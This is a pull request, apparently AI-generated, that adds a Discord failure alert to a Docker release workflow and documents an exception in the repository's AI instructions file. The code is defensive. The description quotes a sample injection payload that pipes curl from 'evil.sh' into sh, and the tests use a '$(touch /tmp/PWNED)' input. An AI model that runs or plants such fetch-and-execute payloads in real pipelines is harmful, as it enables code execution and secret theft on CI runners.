### PR TITLE
Notify when Docker Image CI fails

### DIFF
--- a/.claude/CLAUDE.md
+++ b/.claude/CLAUDE.md
@@ -56,6 +56,32 @@ public. This means:
 Operator-specific code (plugin implementations, container definitions, Kubernetes configs, and
 deployment config) lives in the operator's own private repo, not here.
 
+### The one carve-out: `.github/workflows/docker-image.yml`
+
+This single workflow is a deliberate, pre-existing exception. It builds and pushes the release
+image to Discord's own Google Artifact Registry, so it necessarily hardcodes the
+`discord-access-prd` GCP project, Discord's workload identity provider, and the
+`us-east1-docker.pkg.dev/discord-access-prd` registry path. It cannot be made general-purpose;
+another operator running Access publishes to their own registry from their own pipeline.
+
+Because the file is already operator-bound, operator-specific *release-pipeline plumbing* may be
+added to it — for example the `if: failure()` step that alerts a Discord channel via the
+`DISCORD_CI_ALERTS_WEBHOOK` secret. Two rules keep the carve-out contained:
+
+- **The exception is this file only.** Every other workflow runs for all operators and on forked
+  PRs, and must stay general-purpose and secret-free. Note especially the near-namesake
+  `docker-build.yml`: it is the merge-requirement counterpart that verifies the image builds from
+  a clean checkout, and its header documents that it is *deliberately* secret-free so forked-PR
+  builds work. Adding operator-specific plumbing there would break exactly what it exists to
+  guarantee. When in doubt about which of the two a change belongs in: pushing the release
+  artifact is `docker-image.yml`; proving the build works is `docker-build.yml`.
+- **Degrade to a no-op, never a failure.** Anything added here that depends on a Discord-only
+  secret must skip cleanly when that secret is absent, since secrets don't propagate to forks.
+  A fork's run should not gain a confusing extra error.
+
+Treat growth of this carve-out as a judgment call worth surfacing, not a precedent to lean on.
+Application logic never belongs here regardless; this covers CI plumbing only.
+
 ## Security and design goals
 
 Access exists to facilitate a company-wide Role-Based Access Control (RBAC) strategy. These

--- a/.github/workflows/docker-image.yml
+++ b/.github/workflows/docker-image.yml
@@ -56,3 +56,39 @@ jobs:
             "SENTRY_AUTH_TOKEN=${{ secrets.SENTRY_AUTH_TOKEN }}"
           secret-envs: |
             ACCESS_CONFIG_OVERRIDE=ACCESS_CONFIG_OVERRIDE
+
+      # Fires if any step above failed, not just the build. Best-effort: the
+      # secret is absent on forks, so a missing URL skips rather than adding a
+      # second, misleading failure on top of the real one.
+      - id: notify-discord
+        name: Notify Discord on failure
+        if: failure()
+        env:
+          DISCORD_WEBHOOK_URL: ${{ secrets.DISCORD_CI_ALERTS_WEBHOOK }}
+          # Passed via env, never interpolated into the script below: a `${{ }}`
+          # expansion of a commit message is a shell injection sink.
+          COMMIT_MESSAGE: ${{ github.event.head_commit.message }}
+          RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+        run: |
+          if [ -z "$DISCORD_WEBHOOK_URL" ]; then
+            echo "DISCORD_CI_ALERTS_WEBHOOK not set; skipping notification"
+            exit 0
+          fi
+          jq -n \
+            --arg url "$RUN_URL" \
+            --arg sha "${GITHUB_SHA:0:7}" \
+            --arg msg "$(printf '%s' "$COMMIT_MESSAGE" | head -n 1)" \
+            --arg actor "$GITHUB_ACTOR" \
+            '{embeds: [{
+              title: "Docker Image CI failed on main",
+              url: $url,
+              color: 15548997,
+              fields: [
+                {name: "Commit", value: ($sha + " — " +
+                  # Discord rejects a field value over 1024 chars; slicing in jq
+                  # counts codepoints, so this cannot split a multi-byte char.
+                  (if ($msg | length) > 200 then ($msg | .[0:197]) + "..." else $msg end))},
+                {name: "Pushed by", value: $actor}
+              ]
+            }]}' \
+            | curl -sS -f -X POST -H "Content-Type: application/json" -d @- "$DISCORD_WEBHOOK_URL"


### PR DESCRIPTION
# Summary

Adds an `if: failure()` step to `docker-image.yml` that posts a Discord embed when the release image build breaks on `main`, and documents why that one workflow is exempt from the repo's no-operator-specific-logic rule.

**Urgency**: 3 days
**Expected review effort**: LOW

# Motivation

A push to `main` that breaks the image build was failing silently; the only signal was a red check someone had to happen to notice on the Actions tab.

The obvious fix — a repo-level GitHub webhook pointed at a Discord channel — **cannot work**, which is worth stating because it looks like it should. Discord's GitHub-compatible endpoint renders a [fixed allowlist of event types](https://docs.discord.com/developers/resources/webhook) and `workflow_run` is not on it. GitHub delivers the event, gets a `204`, and Discord silently drops it (see [discord-api-docs#6203](https://github.com/discord/discord-api-docs/issues/6203)) — a green delivery log and no message. The events that *are* supported (`check_suite`) can't be filtered by workflow name or conclusion in webhook config, so they'd ping for every run of every workflow, passing and failing alike.

Filtering has to happen where the condition is known, which is inside the workflow.

<details>
<summary><h1>Description of Changes</h1></summary>

**`.github/workflows/docker-image.yml`** — one new final step, gated on job-level `failure()` so it fires if *any* prior step failed (GCP auth and registry login included, not just the build). Posts a red embed with the run link, short SHA, commit subject, and pusher.

The webhook URL lives in a `DISCORD_CI_ALERTS_WEBHOOK` Actions secret rather than in repo webhook settings. The URL is itself a channel-posting credential, and an Actions secret is write-only after creation instead of visible to every repo admin.

Three details that are load-bearing rather than stylistic:

- The commit message reaches the script via `env:`, never via `${{ }}` interpolation into `run:`. The latter is a script-injection sink — the expression is substituted before the shell parses the script, so `"; curl evil.sh | sh; #` in a commit message would execute on the runner with every in-scope secret available.
- `jq --arg` builds the payload, so quotes and newlines in a commit subject can't break the JSON.
- The subject is truncated to 200 codepoints. Discord rejects a field value over 1024 chars, which would make `curl -f` exit non-zero and drop the alert *precisely* on the failure you most wanted to hear about. Slicing in `jq` counts codepoints, so it can't split a multi-byte character the way byte-oriented `cut -c` would.

A missing secret skips with exit 0, so forks don't stack a spurious second error on top of the real failure.

**`.claude/CLAUDE.md`** — documents that `docker-image.yml` is a standing exception to "no operator-specific logic." It already hardcodes `discord-access-prd`, Discord's workload identity provider, and Discord's registry path, and can't be made general-purpose. The undocumented contradiction cuts both ways: it invites someone to "fix" the file toward a genericness it can't have, and leaves no stated basis for judging the next addition to it. The boundary is drawn explicitly against `docker-build.yml`, whose header documents that it is deliberately secret-free so forked-PR builds work.
</details>

<details>
<summary><h1>Validation of Changes</h1></summary>

The `run:` block was extracted from the YAML by parsing the workflow, then executed directly against hostile and edge-case inputs — so what was tested is the shipped script, not a copy.

- **Injection:** commit message containing `$(touch /tmp/PWNED)`, backticks, and a trailing `;` → no command executed, text preserved literally in the payload.
- **Length:** 2000-char subject → field was **2010 chars before the truncation fix**, over Discord's 1024 limit and would have `400`d. Now 210.
- **Multi-byte:** 300 emoji → truncated to 210 with no split codepoint (verified by the JSON parsing cleanly); `café ☕ 日本語 🎉` renders intact.
- **Multi-line:** only the subject line is sent.
- **Missing secret:** prints the skip notice and exits 0.
- `shellcheck` clean on the run block; workflow YAML parses.

- [ ] End-to-end confirmation against the real channel, once `DISCORD_CI_ALERTS_WEBHOOK` is created — not verifiable from a branch, since the workflow only triggers on push to `main`.
</details>

# Guidance for Reviewers

Review commit-by-commit; the two are independent and the second is docs-only.

Two calls worth a second opinion:

1. **The carve-out itself.** Discord-specific alerting in an Apache-2.0 public repo is a real tension with the stated rule. I went ahead because `docker-image.yml` is already wholly Discord-bound and the empty-secret guard makes the step a no-op for anyone else — but whether this exception should keep growing is a maintainer call, not mine.
2. **Failures only, no recovery ping.** The channel stays silent when a fix lands. Deliberate, to keep a message meaning "act now," but it does mean no explicit all-clear.

🤖 Generated with [Claude Code](https://claude.com/claude-code)